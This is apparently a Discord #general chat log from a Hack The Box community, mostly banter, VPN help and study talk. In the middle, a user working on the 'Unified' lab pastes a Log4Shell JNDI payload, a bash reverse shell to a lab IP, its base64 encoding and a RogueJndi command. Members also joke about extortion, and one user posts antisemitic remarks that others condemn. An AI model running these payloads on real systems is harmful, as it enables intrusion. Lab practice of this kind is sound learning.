#general

1 messages Β· Page 613 of 1

fervent token
#

from kali cmd

#

it is a cmd not an app

#

sudo openvpn /path

#

sudo openvpn /mnt/c/Users/xxxx/Downloads/vpnnamefile.ovpn

swift canyon
#

ok I see

#

ty

fervent token
#

and leave that cmd/kali window open.

#

sudo ping htbmachine

swift canyon
#

ifconfig and same ip

fervent token
#

ping the htb machine

#

what do you see on the open vpn kali windows? where you connected the vpn?

#

2026-04-05 12:22:22 OPTIONS IMPORT: tun-mtu set to 1500
2026-04-05 12:22:22 Preserving previous TUN/TAP instance: tun0
2026-04-05 12:22:22 Initialization Sequence Completed
2026-04-05 12:22:22 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 31, compression: 'lzo'
2026-04-05 12:22:22 Timers: ping 10, ping-restart 120
2026-04-05 12:22:22 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt

swift canyon
#

the command I ran was sudo openvpn then machine eu ip

fervent token
#

no man

#

go to your downloaded ovn file

#

right click, copy path.

swift canyon
#

yes

#

mb

#

thats what I did

fervent token
#

send me the path here please

swift canyon
#

sudo openvpn then the file path

#

wich was on desktop

fervent token
#

hmm

#

with kali you need mnt

#

most surley you entered the path wrong. I did that too

#

send the path here please

swift canyon
#

ok

terse dirge
swift canyon
terse dirge
#

@swift canyon What VPN do you have downloaded and what lab are you trying to access?

terse dirge
sturdy thistle
#

Finall a nice machine for it

terse dirge
fervent token
#

send the path here man. I will send you something

swift canyon
fervent token
#

right click copy path. because desktop is in users in c

swift canyon
#

aa

terse dirge
#

Also you can't run HTB VPNs in the pwn box and don't need to run them on the pwn box to access stuff.

swift canyon
#

Im a bit lost on what to do then

terse dirge
#

You also don't need to run nmap or ping on challenges

#

Once the challenge has spawned you should be able to access it

swift canyon
fervent token
#

sudo openvpn /mnt/home/kali/Desktop/machines_eu-2.ovpn

#

sudo ip route flush cache
sudo killall openvpn

#

first go with the kill and flush

#

is it showing you 2026-04-05 12:47:54 Initialization Sequence Completed

sturdy thistle
hollow iris
#

67

#

67

terse dirge
hollow iris
sturdy thistle
#

We

hollow iris
#

i hate thes mems

#

they are so cringe

#

😭

swift canyon
fervent token
#

without mnt

swift canyon
#

same

fervent token
#

just with the home

#

from /home

#

hmm... odd

swift canyon
#

Options error: In [CMD-LINE]:1: Error opening configuration file: home/kali/Desktop/machines_eu-2.ovpn
Use --help for more information.

fervent token
#

sudo openvpn ~/Desktop/machines_eu-2.ovpn

#

have you downloaded the udp file?

sturdy thistle
#

Do u use WSL or VM?

terse dirge
#

What is bro doing?

sturdy thistle
#

Your path is wrong

swift canyon
sturdy thistle
warm ravine
#

Even though I dont have perms

sturdy thistle
#

How is u Ceald

hollow iris
#

thank u

sturdy thistle
#

I didn’t spoke to you

hollow iris
#

later

#

im busy right now

sturdy thistle
#

I will just ignore you and that’s it for me

warm ravine
hollow iris
#

work bro

hollow iris
#

nice

#

respect

warm ravine
hollow iris
#

im playing

#

talk later

sturdy thistle
warm ravine
sturdy thistle
#

But how r u

hollow iris
#

fine thank u

ornate ibex
#

11.11 anyone superstitious abt the number?

fervent token
hollow iris
#

?

#

like what is this sh

ornate ibex
#

no, u have to rank up

turbid goblet
#

Or buy VIP+

#

i think

#

I saw a noob rank post an embed

#

Just pay to win like i did

safe terrace
#

I have a question about machine called facts in the seasons box

hollow iris
#

no one doin all dat

safe terrace
#

I got access to root and found the user flag with the root flag and when i submitted them they are wrong

hollow iris
#

idk

#

look again

safe terrace
#

Thank u

upbeat tangle
#

You all are beautiful

#

i hope your having a wonderful sunday

open vigil
#

how do you know

#

no one has his/her face as pfp

#

πŸ€“

upbeat tangle
#

i actually dont care, you all are still beautiful

jagged storm
open vigil
#

oooow shiiit

#

he is back

jagged storm
left haven
#

THM dead and here dead too

#

let me see hackersmarter chat

turbid goblet
#

ok bye thank you for ur obsevartion

left haven
#

Can someone ask stupid question to fuel the chat

turbid goblet
left haven
#

Oh i see i already ask haha

crude nest
jagged storm
humble bobcat
signal mica
#

My final message

fervent token
#

who got stuck on garfield?

remote bolt
turbid goblet
#

oh bro is posting shorts

#

why

remote bolt
#

xD

#

this is not a short

west venture
#

Why are you not the moderator

jagged storm
west venture
#

But why 😭

jagged storm
#

Traumatic brain injury

west venture
#

Damn I'm sorry didn't know

jagged storm
#

No, it's fine. No damage. Not only treatable, but curable. I am doing well, and back to my shitposting

west venture
#

Nice

jagged storm
#

But I'd have to climb back up to moderator again

hollow iris
#

hi

west venture
#

Oh

jagged storm
#

And honestly, I don't want to lol

west venture
#

Could you give your role to me

#

If you get it

jagged storm
#

You can just go snag community contributor, do well, and move up to mod

ornate ibex
west venture
#

If I get mod I'm timing out Tejas

#

Just because

#

I can

turbid goblet
#

wait rat u were a mod before?

ornate ibex
#

u cannot, I will be immune

jagged storm
#

Though, mods are pretty sparse these days lol

hollow iris
#

hacktheboxserver

#

😭

#

this ain that serious

jagged storm
hollow iris
#

...

#

their was a modrator

#

in the hackthebox server

#

πŸ₯€

jagged storm
#

I used to basically live in the CPTS channel

hollow iris
#

long long ago

#

...

#

somone lived in the cpts channel

#

πŸ₯€

heady sage
hollow iris
#

...

west venture
hollow iris
#

Oxvader

#

saw that

#

πŸ₯€

heady sage
hollow iris
#

used to live

#

in vader

#

πŸ₯€

#

😭

west venture
bronze lion
#

Btw @west venture , vader is a girl

hollow iris
hollow iris
bronze lion
#

Lol

heady sage
#

Congratulations

#

You’ve been blocked

jagged storm
west venture
hollow iris
#

is a name

#

of aura

snow wraith
hollow iris
heady sage
bronze lion
hollow iris
#

πŸ—Ώ

heady sage
#

Sorry about that

bronze lion
hollow iris
#

me

west venture
heady sage
#

The dumbass transphobe who kept trying to reply to me

hollow iris
#

i am not scared

#

i am discusted

turbid goblet
#

????????????????????????????/

west venture
jagged storm
#

<@&861185840277487616>

hollow iris
#

huh ?

bronze lion
hollow iris
#

yeah

jagged storm
hollow iris
#

and

#

ok

#

yeah im a nazi

west venture
#

Who said what?

hollow iris
#

and a houthi

west venture
#

Oh

#

<@&861185840277487616>

bronze lion
#

Lol

hollow iris
#

ok

west venture
#

My first time pinging serous rule break

hollow iris
#

ban free speach

#

😭

bronze lion
turbid goblet
#

speach

hollow iris
#

jews

hollow iris
west venture
hollow iris
#

he did n othing wrong debate me in dm

west venture
#

So shut up

turbid goblet
#

didnt take long for the moron thoughts to come out

bronze lion
west venture
#

But I like to troll them

#

Till they get banned

hollow iris
#

jew

remote bolt
#

i am interested in buying the hackthebox platform/website.
my offer is 500euro and i can pay it in 10months every month 50euro

i want to be the owner of the website

bronze lion
west venture
#

Bro server the left

remote bolt
#

is it possibru ?

west venture
#

No shut up

remote bolt
#

ok

west venture
#

You're stupid

bronze lion
bronze lion
remote bolt
#

@west venture nobody asked ur opinion

bronze lion
west venture
#

I can state my opinion which is you're stupid

bronze lion
#

Don't start an argument now

#

Waot

#

Wait

ornate ibex
#

scoot

west venture
#

And my opinion is a fact

bronze lion
#

I gotta go workout

#

Bye guys

ornate ibex
#

Bye

remote bolt
#

@west venture sup internet gangster

bronze lion
#

Have fun arguing

ornate ibex
#

do it carefully @bronze lion

crude nest
jagged storm
#

Action is over now

remote bolt
#

keyboard warriorsz

west venture
turbid goblet
#

im getting the feeling he will

remote bolt
#

@west venture ur name is stolen from the real 0day

#

u just added kitty behind it

west venture
#

Uhh

ornate ibex
west venture
#

Okay?

bronze lion
heady sage
west venture
remote bolt
#

xD

#

@west venture you're stupid

west venture
ornate ibex
remote bolt
#

@ornate ibex if he calls me stupid i can call him stupid

ornate ibex
#

Done

#

no more

#

enough

west venture
#

I called you stupid because you ARE stupid

ornate ibex
#

bruh stop the crap

jagged storm
remote bolt
#

@west venture where does the egg come from stupid

ornate ibex
#

I gotta finish the last module

#

ffs

#

pwease

remote bolt
#

ok

#

if u respond to my question u stupid

swift canyon
remote bolt
#

u stupid

west venture
#

egg -> Chicken -> egg

#

Egg first

jagged storm
#

We really gonna have another crash out

ornate ibex
#

and I think I started it 😒

west venture
remote bolt
#

@west venture do i look like i care about rank ?

west venture
ornate ibex
#

I'll assume both of you are messing around. When you both start to hurt each other plz walk away like a gentlemen

west venture
#

Also discord has a reply feature

remote bolt
#

@west venture u don't even know what my main account is stupid

west venture
#

You don't have to ping my name every time you reply

turbid goblet
#

lmao the real let the men fight

remote bolt
#

@west venture

west venture
#

^ proof of stupidity

remote bolt
#

@west venture

west venture
#

Yk I am a moderator right?

#

I can ban you

remote bolt
#

@west venture ban me kick me perm ban me

west venture
#

Okay

jagged storm
west venture
#

Oh

turbid goblet
#

jesus didnt die for this

#

both of u go to church

west venture
remote bolt
#

@west venture better delete it cuz u are scared to get caught and then u'll cry in a corner

west venture
#

delete what?

#

I don't delete what I say

remote bolt
#

@west venture do i also need to put a profile picture ?

ornate ibex
#

Final warning before I timeout both of u.

remote bolt
#

Final warning before i timeout all of u.

jagged storm
#

Don't do it

remote bolt
#

im gonna go do some biceps exercises ciaoo

ornate ibex
#

good

remote bolt
#

@west venture stupid

west venture
#

^timeout

ornate ibex
#

u shud have done the bicep workout.

vivid shoal
#

Is the streak system bugged? Says im 30/0 points and the little fire icon isn't lit up

ornate ibex
#

reach out to the support

west venture
#

Where's my progress bar???

#

My rank progress is missing

jagged storm
west venture
crude nest
vivid shoal
#

Oh gotcha thanks. I guess I never looked on sunday.

scenic maple
#

oh tejas took care of it

jagged storm
#

There were two

ornate ibex
#

Completed path. Finally!

humble bobcat
ornate ibex
#

Thanks πŸ™‚

turbid goblet
#

show off

#

jk gg

humble bobcat
#

deserved

rose onyx
ornate ibex
#

Nah

#

Not so soon

scenic maple
rose onyx
ornate ibex
#

Before 30 June.

scenic maple
#

lets lock on 29 june?

ornate ibex
#

No, get certified before 30 June.

rose onyx
jagged storm
ornate ibex
#

so, I shud attend more than 2 weeks

ornate ibex
sick gate
humble bobcat
#

😰

scenic maple
ornate ibex
#

This.

scenic maple
#

tejas you have to start at june 1

#

or u might be late

#

so?

#

speaking of i will finish the path today or tomrrow

sick gate
jagged storm
#

Same one?

scenic maple
#

cwes

#

yeah

rose onyx
scenic maple
#

gotta refactor the notes

jagged storm
scenic maple
#

gets not banned

ornate ibex
rose onyx
scenic maple
#

but 3 month deadline for me

#

bro more flags more πŸ’ͺ

rose onyx
scenic maple
#

ok so
i have to get cwes in 3 months
i have to either get equal or more flags than tejas

#

if not i get banned

#

deal?

turbid goblet
#

im putting a bet on kalshi golem vs tejas

jagged storm
#

πŸ“Έ

turbid goblet
#

get ur bets in

humble bobcat
#

i think banned is too soft

sick gate
#

Crucified

#

Shot into the sun

#

Fed to sharks

jagged storm
#

Ritualistic scaphism

humble bobcat
#

good ideas

sick gate
#

Because that

jagged storm
sick gate
#

Yep I vote for that one

humble bobcat
#

me too

ornate ibex
humble bobcat
#

@ornate ibexu can do it

ornate ibex
#

I'll have to practice a lot, I feel. Hopefully, I make it in the first attempt.

humble bobcat
#

good luck

ornate ibex
#

Thanks

next pumice
#

someone please help me with starting point unified machine

#

please

turbid goblet
#

arnt there writeups?

#

if not i can just send you mine

#

actually mine arrnt good for learning

ornate ibex
ornate ibex
#

and also me

scenic maple
ornate ibex
#

lol u want me to get fired?

#

πŸ™‚

scenic maple
#

jk lmfao

next pumice
#

the thing is i have been solving it since two days

#

and i am unable too

turbid goblet
#

dm me

next pumice
#

i tried everything

#

how to dm

molten bobcat
#

Good morning

next pumice
#

i am not used to discord

turbid goblet
#

ok i have an answer to all of ur solutions

#

use google

next pumice
#

i am using ir

#

I even read the whole official writeup

molten bobcat
#

Hallo, the starting point has uhh

next pumice
#

and used youtbe

molten bobcat
#

Yeah writeups

#

What's the problem?

#

What step are you stuck on friend

jagged storm
next pumice
#

whenever i try to upload the payload

#

i encrpted it using base 64

scenic maple
next pumice
#

as said in writeup

molten bobcat
#

So I'd like to pause for a moment

#

Encryption and encoding are two different things

#

Big important

next pumice
#

oh i'll try with rot13 now

molten bobcat
#

Base64 is an encoding, not an encryption. It's like speaking another language you can undo it

scenic maple
west venture
#

You can also undo encryption

molten bobcat
#

You're not supposed to be able to without the proper steps lol

#

Or keys

west venture
#

Yeah

#

If you have the keys you can undo encryption

molten bobcat
#

But you don't need this for encoding

#

Because it's not encryption

west venture
#

What form of transformation or representation of data CANNOT you undo?

next pumice
#

but the official writeup doesn't mention use of rot13

molten bobcat
#

Hashing!

#

πŸ˜„

west venture
#

Yup

molten bobcat
#

Yay I know things look at me go

next pumice
#

my brother then what should i do

sick gate
#

Burning

#

Pulping

molten bobcat
#

Gibe me uno moment

jagged storm
molten bobcat
#

I'm reading the writeup

sick gate
#

Nuclear bomb

molten bobcat
#

So I can help better

#

You said unified on starting point yeah?

west venture
next pumice
#

tier 2 unified starting point

turbid goblet
#

use burp

next pumice
#

i uploaded the payload using burpsuit

turbid goblet
#

and u got what

sturdy thistle
next pumice
#

and also got the Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

#

but it is not connecting to nc

molten bobcat
#

Can you copy paste me your payload before you base64 encode it friend?

turbid goblet
#

ur not uploading a shell im pretty sure

#

ur getting creds

next pumice
#

sure ( should I ?)

#

it has my IP

molten bobcat
#

It's your subnet ip

turbid goblet
#

its not ur public ip lol

jagged storm
#

Maybe he's using his real IP

molten bobcat
#

Its not unsafe to share private IP addresses lol

west venture
molten bobcat
#

I'm trying to make sure you wrote your own IP and not the one from the writeup

#

Lol

turbid goblet
#

oh i lied u do get a shell in this

west venture
#

HTB doesn't have forwarding between the VPN clients right?

turbid goblet
#

this is from my writeup

next pumice
#

${jndi:ldap://{ tun0 }:1389/o=tomcat}

west venture
#

Like if I am connected to the same subnet as you, can I ping you?

molten bobcat
#

This is the payload the writeup is using

next pumice
#

this is what exactly my screen looks like but i am not connecting to nc

west venture
jagged storm
#

Cyberchef mentioned

molten bobcat
#

It starts with log4j yeah

next pumice
#

echo 'bash -c bash -i >&/dev/tcp/10.10.15.245/4444 0>&1' |
base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMjQ1LzQ0NDQgMD4mMQo=

molten bobcat
#

Okay he replaced his IP good good

#

What's with the extra echo?

next pumice
#

i did it in terminal

#

just copy pasted what writeup said ( Trust me i did not wanted to cheat

turbid goblet
#

writeups arent cheating if ur learning

jagged storm
west venture
#

Wait if my understanding about the whole log4j thing is correct, should you not host a malicious java Library on your ldap server??

#

Idk

#

Without a bash reverse shell

next pumice
#

i have

molten bobcat
#

Oh I think I see your issue sir

next pumice
#

rohue jndi

tight kindle
west venture
#

yeah it's not bash I think

next pumice
#

openjdk-11-jdk

#

and maven too

molten bobcat
#

Ohhhhhhh

#

Okay dude

west venture
#

You gotta create the reverse shell inside the java Library

molten bobcat
#

That command

#

Is designed to spit out the base64 encoded command

#

In the terminal

#

That's why it echos

next pumice
#

β”Œβ”€[eu-starting-point-2-dhcp]─[10.10.15.245]─[htb-mp-2518939@htb-kzu8rdkw10-htb-cloud-com]─[~/rogue-jndi]
└──╼ [β˜…]$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMjQ1LzQ0NDQgMD4mMQo=|{base64,-d}|{bash,-i}" --hostname "10.10.15.245"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.15.245:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.15.245:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.15.245:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.15.245:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.15.245:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.15.245:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.15.245:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.15.245:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

molten bobcat
#

See what I mean?

tight kindle
jagged storm
#

Oh starting point has you go that far? I would have expected it to be the easiest possible stuff

turbid goblet
#

starting point was really rough for me lmao

#

i too expected it to be really simple

molten bobcat
#

Starting point has updated a time or two since I've done it

jagged storm
#

I would think like some boot to root stuff, or suid stuff

west venture
#

What's wrong

next pumice
#

i am unable to send the screen shot here

#

how can i send the screen shot

west venture
#

DM me

molten bobcat
#

And yes, it's a command intended to show the payload being base64 encoded

next pumice
#

how to dm

molten bobcat
#

Click profile, add friend, message bubble

#

Don't be a dick lol

west venture
#

Yeah so you need to have your bash reverse shell be executed by the java class file

molten bobcat
#

They are but we're trying to help friendo here

tight kindle
#

can anobody help with the Kobold machine. Been stuck at PrivEsc since yesterday.

next pumice
#

i have sent the screenshot the gentleman who asked me to DM

molten bobcat
#

Nice nice

jagged storm
#

This is kinda par for general. Maybe #starting-point . Not sure if there is image perms there

molten bobcat
#

You got this

#

It's okie

#

Memes are allowed here and I'll prove it uhhh

small osprey
#

All good. seems jokes only apply for some.

molten bobcat
tight kindle
molten bobcat
#

Other than that it's back to our regularly scheduled clown posting

#

I fixed my vps

#

I'm very happy about it

molten bobcat
#

I'm good!

#

My diet has been helping me a lot

#

Significantly less misery in my life

jagged storm
#

Today's always good

molten bobcat
#

Also happy Easter to all who celebrate

#

It is the bunny Christ day

#

🐰

jagged storm
#

It's the worst day to be homeless. Everything is closed lol

#

I could potentially relocate, but not until my medical situation is done.

#

But I'm in a good spot to shiny up the resume first. I think I'll finish maldev academy, and grab both CRTO I and II

#

I think I can knock it all out in 5 months

#

I was looking at OSEP and OSED, but between the price and the stuff I didn't want to do, neither fit right

#

I really need CS experience, so I want that CRTO

#

OSED looked interesting, but i feel like my maldev academy already goes beyond the stuff I'd like from it, and I'm not all that interested in the binary exploitation

#

How far are you in osep?

#

It still 24 hours?

#

Ah

inland lantern
#

go for it

jagged storm
#

Does it not have much web?

inland lantern
#

and then next do COAE

#

πŸ˜›

jagged storm
#

The new cert

inland lantern
#

this one πŸ˜›

jagged storm
#

I was looking at the CRTO exam structure, and was sad that there is no report portion. After the beast that was the CPTS report, I felt ready for anything, and there's just nothing.

#

Nope. You get scored on two things - flags and opsec

#

Alerts hurt your score

#

You can also pause your exam time

#

I think the first exam is basic AV evasion

#

Second one is more advanced

#

But you have to use cobalt strike, which they give you during it

west venture
#

Please

jagged storm
#

It's like the only way to get cobalt strike experience without working somewhere that has it first lol

#

fitgirlcobaltstrike

#

I'm building my project for havoc

#

I don't like it either lol

#

Because sliver is filthy go

latent oak
#

Hola

#

Happy chocolate-induced stomach ache day

worthy cargo
#

Happy good morning

#

I'm so happy today that I woke up

#

I could have just as easily not woken up

#

Another beautiful day in the life

#

I must go poo now

west venture
#

I wish to never waken up

jagged storm
west venture
#

I wish to become unconscious, completely bypassing sleep

turbid goblet
#

if there is no physical health toll to that wish i want it too

#

i could accomplish so much more if i never needed to sleep

jagged storm
turbid goblet
west venture
#

rat make me unconscious

#

So that I can never wake up

static bloom
jagged storm
turbid goblet
#

good sleep affects memory

static bloom
#

realistically it's probably going to have an effect on you possibly dying earlier, but none of us know when that is going to happen

west venture
#

Typically within a month

static bloom
#

how long are we talking? -- i'm guessing you meant staying awake for a month, probably yeah

jagged storm
#

I don't think anyone has gone without sleep for more than like 10 days

turbid goblet
#

Some might say that sleep is the most important hacker skill

fleet rose
jagged storm
static bloom
#

i'd argue obsession

#

in any field

turbid goblet
#

Randy gardner stayed awake for 11days and 25minutes

#

and lived

heady sage
#

My mom is googling the 67 meme

zealous charm
heady sage
#

Dear god

static bloom
jagged storm
#

This is a fair question

static bloom
#

good. i was about to say I hope the answer is no πŸ˜„

west venture
#

Up in heaven....

#

SIX SEVEN...

mystic patio
#

Six seven!

azure remnant
#

Hi im kevin

turbid goblet
#

almost heaven. west virginia, blue right mountain!

rugged dune
#

bruh

azure remnant
#

Braaaaaah u broke it

rugged dune
#

salut la monde

azure remnant
#

La fishe la chocolat

rugged dune
#

les baguette

azure remnant
#

Uvevweve

scenic maple
#

does any kind sould have eyewitness installed

azure remnant
#

Ive it installed

turbid goblet
#

i do

scenic maple
#

how tf did u install it

#

😭

azure remnant
#

Lemme recall

turbid goblet
#

i think it was just on kali

azure remnant
#

Ive it on kubuntu

scenic maple
#

lmao rip

turbid goblet
#

installation in readme

jagged storm
scenic maple
#

yeah

azure remnant
scenic maple
#

i am 90% sure this will be useless in the exam but i am gatekept on the module question

jagged storm
#

I had issues as well, if I remember. I think it also only works with chrome?

scenic maple
#

yeah but i gotta install it first

azure remnant
#

Theres Aquatone too

turbid goblet
scenic maple
#

currencly running into lots of problems

#

installing

jagged storm
#

I hated it, and skipped

azure remnant
#

Ive had both give different results though

scenic maple
#

so whats the name of the db file waz

#

jk dont tell in chat

alpine pumice
#

imagine using chromium based browsers

scenic maple
#

well i am gonna read the source code to find out

#

modern problems need modern solutions

jagged storm
#

I get why you would use something like that in real life, but I'd rather manually do it unless it's a whole lot

scenic maple
#

haha lmfao reading the code worked

#

i aint installing it

azure remnant
scenic maple
#

ye that one worked

azure remnant
#

And eyewitness is tthe same as the output file i guess

#

Example.xml

scenic maple
#

nope its diff but i wont say in chat

#

cause it might spoil module

azure remnant
#

Maybe the opposite

azure remnant
#

Fbi open up

#

"whats wrong"

#

-WHATS WRONG ?

#

"shows discord chat"

#

-THIS IS FNG WRONG

hardy frigate
#

Cant believe how bad the new UI is for academy

#

U cant even start a new section in a new tab

jagged storm
jagged storm
#

Also, I'm adding that amazing gif

azure remnant
#

I aquire more time by wasting others' people time so i win

upbeat tangle
#

Is there a problem login the website?

scenic maple
#

which one?

#

labs or acad

upbeat tangle
#

Some PJQ180 error

#

just the general login

scenic maple
#

both works for me

young glen
#

πŸ‘

rugged dune
#

wtf

#

i thought it was a joke

#

i submitted user flag now in root and it was accepted

#

☠️

young glen
upbeat tangle
#

browser magic

scenic maple
#

πŸ€·β€β™‚οΈ

#

maybe clean stuff

#

and try again

quaint sun
#

someone else was asking about the PJQ180 error earlier

upbeat tangle
swift canyon
#

any1 knows why it doesnt let me scan a target machine ip on a starting point

#

Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done

#

I can ping the ip

#

but cant scan it

devout sail
#

Cmd?

quaint sun
swift canyon
devout sail
#

Full command

#

You want help yet are soo lazy to respond πŸ‘οΈπŸ‘οΈ

swift canyon
#

thats the command

turbid goblet
#

lmao

molten bobcat
#

So that's not sufficient

turbid goblet
#

good luck

quaint sun
#

You need to target the IP in an Nmap scan.

nmap -sV <ip>

swift canyon
#

nmap -sV 10.129.71.180

#

ah

#

mb

molten bobcat
#

Okay there you go

#

So even with the IP you get nada?

swift canyon
#

I did with the ip before

#

dindt mention it mb

swift canyon
molten bobcat
#

Gotcha, so nmap does take a while it's not instant

devout sail
#

And it takes some time
Not too long tho

swift canyon
#

imma wait a bit ig

molten bobcat
#

Give it 5 minutes

#

That's my usual go to wait time

devout sail
#

Dont click the power button tho

swift canyon
#

but it stays at 0%

turbid goblet
#

i feel like thats not efficient anyways

quaint sun
#

If you still have trouble, add -v or -vv (double verbose) to troubleshoot

turbid goblet
#

find open ports before u run version or scripts against it. if its probing version for every port its gonna be slower

devout sail
#

Or do without any flags first

quaint sun
#

Yeah that too

turbid goblet
#

or use rustscan bc rustscan is goated

#

rustscan -a {ip} --ulimit 5000 -b 500 -- -A -Pn

swift canyon
#

Nmap scan report for 19.129.71.180
Host is up (0.00071s latency).
All 1000 scanned ports on 19.129.71.180 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

devout sail
#

I usually go with
sudo nmap -sC -sV -vv IP
Never really had to wait for more than a min

#

Don't use rustscan yet, learn the nmap properly first

turbid goblet
analog perch
#

@eager sedge Issue resolved with Kali. Thanks!

swift canyon
#

just nmap then ip

quaint sun
devout sail
devout sail
lime bone
devout sail
#

This can take sometime to run

#

So I've Aaaaalready ran it

quaint sun
swift canyon
#

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.10 seconds

sturdy thistle
#

told it before this is general

swift canyon
young glen
upbeat tangle
swift canyon
#

I just think that 1 machine was broken tbh

swift canyon
#

works fine on another machine

alpine pumice
scenic maple
alpine pumice
#

haven't tried

#

a bit ago a docker container spawned for me

worthy cargo
#

I got lamb shank and rice and garlic sauce

fleet rose
#

Thoughts on using arch linux for cybersecurity anyone?

worthy cargo
#

Nom nom

#

use Kali or parrot OS

worthy cargo
#

arch is fine

#

but you'll have to install all the tools yourself

worthy cargo
#

Kali already comes with it

fleet rose
#

I use parrot as of now

worthy cargo
#

I don't want to have to do a lot of work on a distro/OS setup

#

I need something that alrady have all

#

minimal configs on my part

fleet rose
#

Although i did try to set up blackarch but a lot of tools having trouble ti be installed

worthy cargo
#

minimal work on my part

fleet rose
#

So parrot and kali does the work u say

worthy cargo
#

Yes

jagged storm
#

Is blackarch even still maintained

fleet rose
#

Didnt check that one

#

But it did install a fair amount of tools

young glen
fleet rose
#

I think the repository is mostly maintained , as for the ISO im not sure

young glen
#

It’s good as bootable distro but there are permanent install options as well

fleet rose
west venture
#

Distros don't matter

#

It's all Linux

young glen
#

Hannah Montana Linux

fleet rose
west venture
#

Which is perfectly usable

fringe viper
#

Hellooo

west venture
#

The biggest misunderstanding begginers get Is thinking Linux distros are different operating systems

fringe viper
#

i tried reporting a vuln through responsible disclosure and i got shot down??

fringe viper
fringe viper
west venture
#

Use it as leverage to extort money

jagged storm
jagged storm
#

So what you did is called a crime

west venture
#

πŸ’€

alpine pumice
#

yikes

fringe viper
#

i didnt exploit it

west venture
#

Still

jagged storm
#

You don't have to, for it to be a crime

alpine pumice
#

big yikes

fringe viper
#

i had the restaurant owner with me

#

i showed him it

alpine pumice
#

"i had the bank owner with me when i robbed the bank"

jagged storm
#

Cool motive. Still crime.

fringe viper
#

also tried reporting to the POS saas too

#

then what do you do just leave the bug ??

jagged storm
#

Use a proper bug bounty or vdp

#

Or don't complain when you get shot down, or wind up in federal prison

fringe viper
west venture
#

Well the least you can do now is double down and threaten to cause massive losses to the restaurant unless they pay you a monthly fee....

#

Yk what they say

west venture
#

If you commit a crime, go all the way

fringe viper
jagged storm
#

That's this thing called illegal

fringe viper
jagged storm
fringe viper
#

oh

#

my bad

jagged storm
#

Mods should already boot you lol

fringe viper
#

i just got here

#

i wasn’t trying to do something bad

west venture
#

Well since the owner ignored you, you definitely did earn the rights to go and call him stupid to his face

west venture
jagged storm
west venture
#

Like why get mad and be all egoistic and not care about it, and risk someone actually exploiting the vulnerability next time

west venture
#

But lawfully they can do whatever they want

#

And you can't

fringe viper
#

i got a call from their security team and she sounded annoyed

fringe viper
alpine pumice
#

Better hope they don't press charges

fringe viper
#

or they’re using paper mail

rancid snow
#

usually its either paper mail or they randomly show up to collect you

fringe viper
#

damn

#

i thought i was doing the right thing tho

west venture
lime mirage
#

Stay safe and follow the law next time, I understand you had good intentions but you always need explicit permission and to verify it ,if theres a bug bounty read policy and scope that's a safe bet

west venture
rancid snow
# fringe viper i thought i was doing the right thing tho

you can be motived to do the right thing but still fuck up. Thats why its strongly encouraged to get a better foundation before trying stuff in the real world, especially since its an extremely thin line between legitimate work and jail time in this field

fringe viper
fringe viper
rancid snow
#

also depending on your jurisdiction, safe harbor laws might be protecting you, in which case youre actually fine but I wouldnt risk it in the future

molten bobcat
west venture
fringe viper
rancid snow
west venture
fringe viper
west venture
#

Unless you go to them and tell them of course

rancid snow
#

that also

west venture
fringe viper
west venture
#

No

fringe viper
#

the job role?

west venture
#

Thats the complicated part. I do everything

fringe viper
#

oh

#

i mean thats kinda cool

west venture
#

Lol

fringe viper
#

do you own the place you work at?

west venture
#

No it's a factory

frosty trellis
#

rando question, did they do an overhaul on the streak system ?

fringe viper
#

oh

fringe viper
west venture
fringe viper
frosty trellis
#

i know been digging through some of it. but i just noticed reading padges and anwsering question do not provide you with point anymore

west venture
#

No it produces tea

fringe viper
frosty trellis
#

can you elaborate on that lol for me. i like to know how to keep my streak alive

alpine pumice
fringe viper
frosty trellis
#

sorry seems there is a little confusion. i am not refuring to cubes i am talking about the motivation streak system

west venture
#

Idk I guess keep learning? I am the one who needs advice lol.
But yeah, keep learning

distant grail
frosty trellis
#

that earns you badges

fringe viper
distant grail
azure remnant
#

I named my wifi hotspot North korean spying surveillence

jagged storm
fringe viper
#

like i dont know where to look

distant grail
fringe viper
#

picking a particular endpoint is coool but i wish i knew what to probe into just by looking at it

jagged storm
distant grail
#

If you want to do bugbounty

#

Pick a vuln you want to learn, don't try to master them all at once

#

I've been there, doing a little bit of idor, little bit of xss, little bit of sqli etc etc will make you learn nothing

fringe viper
#

yeah i picked broken access control

#

i like idor

fringe viper
distant grail
#

None sadly enough, I'm not a star with bounties

#

Totally different methodology etc then what I'm used to

fringe viper